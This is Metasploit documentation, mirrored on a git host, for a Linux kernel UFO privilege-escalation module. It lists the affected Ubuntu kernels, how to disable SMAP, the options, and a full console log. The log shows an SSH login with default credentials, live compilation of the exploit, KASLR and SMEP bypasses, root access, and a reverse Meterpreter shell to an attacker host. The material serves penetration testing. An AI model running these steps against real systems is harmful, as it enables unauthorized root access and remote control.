dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md

4.9 KiB
Raw Permalink Blame History

Vulnerable Application

This module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload (UFO).

The bug was initially introduced in October 2005 and patched in September 2017, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0-21 <= 4.4.0-89 (Trusty), and 4.4.0-81 <= 4.8.0-58 (Xenial), including Linux distros based on Ubuntu such as Linux Mint.

Disabling SMAP

Original Instructions

To disable SMAP on a system, edit /etc/default/grub and add nosmap to the GRUB_CMDLINE_LINUX_DEFAULT line. Next, sudo update-grub, and reboot.

To verify SMAP has been disabled, grep smap /proc/cpuinfo and nothing should be returned.

Verification Steps

  1. Start msfconsole
  2. Get a shell on a vulnerable box
  3. Do: use exploit/linux/local/ufo_privilege_escalation
  4. Do: set session [#]
  5. Do: run
  6. You should get a root shell.

Options

WritableDir

A folder we can write files to. Defaults to /tmp

COMPILE

If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto

Compiled Executables

The module makes use of a pre-compiled exploit executable to be used when gcc is not available on the target host for live compiling, or COMPILE is set to False.

The executable was cross-compiled with musl-cross.

./x86_64-linux-musl-gcc -o exploit.out -pie -static exploit.c

Scenarios

Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop

Initial Access

resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login
resource (ubuntu.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (ubuntu.rb)> set username ubuntu
username => ubuntu
resource (ubuntu.rb)> set password ubuntu
password => ubuntu
resource (ubuntu.rb)> exploit
[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:45819 -> 2.2.2.2:22) at 2018-04-03 20:58:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Escalate

In this scenario, gcc is installed so we can live compile on the system.

msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation 
msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true
verbose => true
msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(linux/local/ufo_privilege_escalation) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] Linux kernel version 4.4.0-31-generic is vulnerable
[*] Checking if SMAP is enabled ...
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] Unprivileged user namespaces are permitted
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.4UnI1EFL.c' (28356 bytes) ...
[*] Max line length is 65537
[*] Writing 28356 bytes in 2 chunks of 57414 bytes (octal-encoded), using printf
[*] Next chunk is 43454 bytes
[*] Writing '/tmp/.S6G2g9rnUj' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] [.] starting
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-31-generic' detected
[*] [~] done, version looks good
[*] [.] checking SMEP and SMAP
[*] [~] done, looks good
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] KASLR bypass enabled, getting kernel addr
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-31-generic...
[*] [-] open/read(/boot/System.map-4.4.0-31-generic)
[*] [.] trying syslog...
[*] [~] done, kernel addr:   ffffffff81000000
[*] [.] commit_creds:        ffffffff8109d760
[*] [.] prepare_kernel_cred: ffffffff8109da40
[*] [.] SMEP bypass enabled, mmapping fake stack
[*] [~] done, fake stack mmapped
[*] [.] executing payload ffffffff8104516a
[*] [~] done, should be root now
[*] [.] checking if we got root
[*] [+] got r00t ^_^
[*] Cleaning up /tmp/.S6G2g9rnUj and /tmp/.4UnI1EFL ...
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60474) at 2018-07-21 13:35:49 -0400

meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Ubuntu 14.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >